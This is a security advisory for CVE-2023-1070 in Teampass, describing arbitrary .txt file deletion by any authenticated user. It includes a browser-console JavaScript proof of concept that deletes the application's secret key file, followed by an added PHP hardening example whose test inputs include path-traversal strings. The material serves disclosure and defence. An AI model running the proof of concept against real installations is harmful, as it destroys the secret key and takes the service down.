Headline
CVE-2023-1070: Arbitrary txt files deletion (authenticated) in teampass
External Control of File Name or Path in GitHub repository nilsteampassnet/teampass prior to 3.0.0.22.
Description
The file sources/export.queries.php can be exploited by any authenticated user to remove arbitrary txt files. If the system administrator configured the base path for the teampass-seckey.txt to be /var/teampass, as shown in the official example, it is possible to remove it causing a total disruption of the application (all the pages will return 500 Internal Server Error).
When the attack is executed, the original .txt file is deleted and a new file with the same name but without the extension is created. The new file contains some HTML and the content of the original file encrypted with a password chosen by the attacker, making recovery of the original file impossible.
Proof of Concept
The following PoC assumes that the Teampass SaltKey is stored at /var/teampass/teampass-seckey.txt.
Login with any user (no special permission is required), open a browser console and execute the following JavaScript:
fetch('http://localhost/teampass/sources/export.queries.php', {
    method: 'POST',
    credentials: 'include',
    body: new URLSearchParams({
        type: 'export_to_html_format_finalize',
        file: '/var/teampass/teampass-seckey',
        pdf_password: 'GoodbyeSecretKey'
    }),
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
})
Impact
This vulnerability can be used by an attacker with low privileges to remove arbitrary txt files. It can lead to a total loss of availability if the path of the teampass-seckey.txt is known.
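The root cause described above is an externally controlled file path: the file parameter reaches the filesystem without being confined to the export location. The advisory does not show the affected source, so the PHP below is an added example of how such a sink is hardened, not code from Teampass or from the fix in 3.0.0.22. The export directory, the permitted extensions and the function names are assumptions for illustration.

```php
<?php
// Added example, not Teampass code. Confine an export "file" parameter to a plain
// file name inside one fixed export directory before any filesystem operation.
// $exportDir and the allowed extensions are assumptions for this illustration.

function resolveExportPath(string $exportDir, string $requested): ?string
{
    // Accept only a plain file name: an allow-list of characters excludes
    // slashes, NUL bytes and other separators. The D modifier stops "$" from
    // tolerating a trailing newline.
    if ($requested === '' || !preg_match('/^[A-Za-z0-9._-]+$/D', $requested)) {
        return null;
    }
    if ($requested === '.' || $requested === '..') {
        return null;
    }

    // Only the formats the export feature is expected to produce.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ['html', 'pdf'], true)) {
        return null;
    }

    $base = realpath($exportDir);
    if ($base === false) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $requested;

    // If the file already exists, canonicalize it and confirm it still lives
    // under the export directory (a symlink placed there could point elsewhere).
    // realpath() fails for files not created yet, so fall back to the joined path.
    $real = realpath($candidate);
    if ($real !== false) {
        if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
            return null;
        }
        return $real;
    }
    return $candidate;
}

// Remove an export only through the validated path, never the raw parameter.
function removeExport(string $exportDir, string $requested): bool
{
    $path = resolveExportPath($exportDir, $requested);
    if ($path === null) {
        error_log('export: rejected file parameter ' . json_encode($requested));
        return false;
    }
    if (is_file($path)) {
        return unlink($path);
    }
    return false;
}

// Constructed demonstration: an export directory created under the system temp dir.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'export-demo';
@mkdir($dir);
$inputs = [
    'vault-export.html',                 // plain name, allowed extension
    '../../teampass-seckey.txt',         // parent traversal, rejected by the allow-list
    '/var/teampass/teampass-seckey',     // absolute path, rejected by the allow-list
    'vault-export.txt',                  // wrong extension for an export artifact
];
foreach ($inputs as $param) {
    $path = resolveExportPath($dir, $param);
    echo str_pad($param, 36) . ' => ' . ($path === null ? 'REJECTED' : $path) . PHP_EOL;
}
```

Two properties matter here: the parameter is never interpreted as a path (no directory component survives the allow-list), and the resulting location is re-checked against the export directory after canonicalization. Rejections are logged with the raw value so that attempts like the one in the PoC become visible in application logs.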